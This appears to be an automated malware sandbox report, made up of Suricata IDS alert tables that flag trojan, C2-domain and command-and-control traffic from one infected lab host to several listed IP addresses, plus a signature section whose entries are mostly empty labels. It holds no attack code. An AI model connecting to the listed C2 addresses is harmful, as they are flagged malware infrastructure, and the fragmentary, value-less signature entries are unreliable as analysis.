2025-03-06T08:11:44.321777+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50804 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:45.672242+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50839 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:48.924800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50902 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:50.479791+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50951 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:53.135867+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50998 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:56.022985+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 51039 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:59.155904+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 51082 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:12:02.375781+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 51118 | 104.21.48.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:59.581220+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:02.927197+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 64532 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:22.802782+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53736 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:25.453470+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53889 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:27.043208+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53928 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:28.758723+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53957 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:29.700882+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50532 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:43.977267+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50776 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:44.321253+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50783 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:46.583683+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50839 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:49.797302+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 50902 | 104.21.48.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:59.581220+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:22.802782+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 53736 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:27.043208+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 53928 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:43.977267+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.11 | 50776 | 104.21.48.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:58.872169+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:01.455608+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64532 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:05.348829+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64586 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:09.589956+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64662 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:13.746062+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64756 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:17.035737+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 64821 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:22.501727+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 53747 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:27.889618+0100 | 2060386 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 53957 | 104.21.80.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.392169+0100 | 2060410 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 56056 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.500878+0100 | 2060412 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 49380 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:57.054256+0100 | 2060385 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 58494 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.342665+0100 | 2060414 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 52324 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.473826+0100 | 2060416 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 61809 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.439579+0100 | 2060418 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 62407 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.487878+0100 | 2060420 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 61070 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.460757+0100 | 2060422 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 61777 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:15.380081+0100 | 2060424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 59174 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:24.841170+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 49762 | TCP |
2025-03-06T08:11:08.316833+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 64638 | TCP |
2025-03-06T08:11:49.121923+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 45.93.20.28 | 80 | 192.168.2.11 | 50918 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:24.781546+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:08.294584+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:48.980732+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:25.052844+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:08.521453+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:49.354046+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:01.151633+0100 | 2044249 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:43.417061+0100 | 2044249 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50822 | 38.180.229.217 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:25.886236+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:09.083260+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:51.167019+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:25.276585+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 49762 | TCP |
2025-03-06T08:11:08.539104+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 64638 | TCP |
2025-03-06T08:11:49.385659+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 45.93.20.28 | 80 | 192.168.2.11 | 50918 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:06.877348+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64586 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:36.746461+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50654 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:12:00.044452+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 51082 | 104.21.48.1 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:24.567613+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:08.038389+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:48.723929+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:07.081676+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.11 | 49752 | 176.113.115.6 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:20.526495+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49759 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:10:31.966158+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49777 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:10:36.433776+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49791 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:10:41.077034+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49796 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:10:45.475636+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49802 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:10:49.850438+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 59843 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:10:54.997278+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 59898 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:10:59.715567+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 59985 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:05.223654+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 64596 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:10.093570+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 64700 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:15.292947+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 64808 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:20.280059+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 53717 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:24.896420+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 53925 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:29.326690+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50556 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:33.746496+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50641 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:38.160634+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50706 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:43.541179+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50812 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:48.131201+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50911 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:52.608288+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 51005 | 107.189.27.66 | 80 | TCP |
2025-03-06T08:11:57.029519+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 51066 | 107.189.27.66 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:11.849663+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49755 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:10:17.676605+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49757 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:10:22.998574+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49761 | 45.59.120.8 | 80 | TCP |
2025-03-06T08:10:24.897256+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49763 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:10:32.054230+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49776 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:10:38.580972+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49793 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:10:44.173243+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49801 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:10:54.125864+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 59889 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:01.289703+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 64553 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:11.530513+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 64734 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:20.455950+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 53723 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:31.570917+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50589 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:38.412334+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50709 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:45.383657+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50845 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:52.670839+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 51004 | 176.113.115.7 | 80 | TCP |
2025-03-06T08:11:57.182647+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 51067 | 176.113.115.7 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:26.376164+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:10:51.926775+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:10:53.619352+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:10:54.450296+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:10:55.202313+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:10:57.213629+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:10:57.744358+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:09.760378+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:31.362311+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50576 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:32.375360+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50576 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:33.566273+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50637 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:34.943927+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50656 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:37.496570+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50694 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:38.614418+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50715 | 38.180.229.217 | 80 | TCP |
2025-03-06T08:11:51.400793+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:58.974565+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.11 | 51103 | 185.176.43.98 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:11:22.510401+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.11 | 53747 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:39.121321+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.11 | 50703 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:44.330345+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.11 | 50804 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:12:02.382432+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.11 | 51118 | 104.21.48.1 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Phishing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00C7DBBE | |
Source: | Code function: | 0_2_00C4C2A2 | |
Source: | Code function: | 0_2_00C868EE | |
Source: | Code function: | 0_2_00C8698F | |
Source: | Code function: | 0_2_00C7D076 | |
Source: | Code function: | 0_2_00C7D3A9 | |
Source: | Code function: | 0_2_00C89642 | |
Source: | Code function: | 0_2_00C8979D | |
Source: | Code function: | 0_2_00C89B2B | |
Source: | Code function: | 0_2_00C85C97 | |
Source: | Code function: | 20_2_00BEF011 | |
Source: | Code function: | 21_2_00CEF011 |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Memory has grown: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | IPs: | ||
Source: | IPs: | ||
Source: | IPs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | File created: |
Source: | Network traffic detected: |
Source: | Network traffic detected: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
